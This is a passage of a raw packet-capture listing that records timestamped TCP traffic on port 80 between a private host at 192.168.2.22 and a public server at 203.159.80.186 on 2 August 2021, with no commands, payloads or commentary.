                                Aug 2, 2021 10:59:58.833560944 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833599091 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833605051 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833643913 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833678007 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833684921 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833714008 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833748102 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833759069 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833787918 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833822966 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833827019 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833857059 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833899975 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833913088 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.833939075 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833972931 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.833977938 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834008932 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834043026 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834064007 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834078074 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834112883 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834119081 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834147930 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834192991 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834254026 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834261894 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834290981 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834323883 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834337950 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834362984 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834397078 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834404945 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834430933 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834465981 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834477901 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834500074 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834539890 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834544897 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834583044 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834630013 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834651947 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834690094 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834733009 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834763050 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834796906 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834798098 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834834099 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834832907 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834867954 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834908009 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.834912062 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834949970 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.834985018 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835016966 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.835021019 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835103989 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835105896 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.835218906 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835257053 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835268974 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.835290909 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835330963 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.835335016 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835376024 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835411072 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.835412979 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.836812973 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.866736889 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.866879940 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.866945982 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.867096901 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867172003 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867228031 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.867345095 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867541075 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867578030 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.867607117 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867670059 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867705107 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.867796898 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867860079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.867893934 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868058920 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868113041 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868149996 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868177891 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868241072 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868267059 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868284941 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868298054 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868319988 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868328094 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868341923 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868364096 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868375063 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868390083 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868412971 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868421078 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868434906 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868457079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868467093 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868478060 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868498087 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868506908 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868520021 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868544102 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868561983 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868570089 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868592978 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868602037 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868627071 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868644953 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868655920 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868662119 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868679047 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868690968 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868695974 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868714094 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868731022 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868735075 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868755102 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868772030 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868772030 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868789911 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868808031 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868808985 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868825912 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868843079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868851900 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868860960 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868871927 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868881941 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868902922 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868916035 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868920088 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868937016 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868952990 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.868956089 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.868989944 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.896451950 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896485090 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896500111 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896522045 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896543026 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896570921 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896569967 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.896595001 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896600008 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.896617889 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.896646023 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899214983 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899250984 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899280071 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899301052 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899306059 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899333000 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899338007 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899362087 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899372101 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899389029 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899415970 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899441004 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899446964 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899475098 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899485111 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899504900 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899530888 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899544954 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899555922 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899583101 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899595022 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.899609089 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899636984 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.899646044 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900084972 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900110960 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900136948 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900214911 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900258064 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900338888 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900369883 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900396109 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900403023 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900420904 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900446892 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900451899 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900473118 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900504112 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900505066 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900533915 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900559902 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900568008 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900587082 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900613070 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900618076 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900639057 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900665045 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900666952 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900691986 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900723934 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900724888 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900753975 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900779009 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900785923 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900804996 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900830984 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900839090 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900856018 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900882006 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900885105 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900907993 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900939941 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.900939941 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900969982 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.900995016 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901004076 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901021957 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901047945 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901052952 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901072979 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901098967 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901107073 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901124954 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901154995 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901156902 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901186943 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901212931 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901221037 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901240110 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901266098 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901269913 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901289940 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901315928 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901320934 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901343107 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901375055 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901376009 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901402950 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901428938 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901432991 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901456118 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901482105 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901485920 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901506901 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901531935 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901536942 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901559114 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901588917 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901590109 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901619911 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901647091 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901652098 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901673079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901699066 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901705027 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901725054 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901750088 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901751995 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901776075 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901806116 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901807070 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901835918 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901861906 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901870012 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901887894 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901915073 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901918888 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901940107 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901966095 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.901968956 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.901992083 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.902023077 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.902033091 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.902051926 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.902077913 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.902086020 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.902105093 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.902131081 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.902141094 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.902156115 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.902183056 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.902189970 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.903403997 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.927838087 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.927920103 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.927942991 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.927963972 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.927978992 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.927985907 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928006887 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928029060 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928030968 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.928051949 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.928105116 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928128004 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928144932 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.928148031 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928169012 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928189993 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928214073 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928236008 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.928240061 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.928258896 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.928272009 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.931773901 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931797981 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931814909 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931830883 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931847095 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931860924 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.931864977 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931879997 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.931881905 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931898117 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931899071 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.931914091 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931931973 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.931934118 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931952000 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931968927 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.931977987 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.931997061 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932013988 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932018995 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.932032108 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932046890 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932055950 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.932065010 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932080030 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932096958 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932106018 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.932113886 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932132959 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932136059 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.932151079 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932157993 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.932167053 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932183981 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932192087 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.932200909 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932215929 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932224035 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.932233095 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932248116 CEST8049167203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:58.932259083 CEST4916780192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:58.932306051 CEST4916780192.168.2.22203.159.80.186
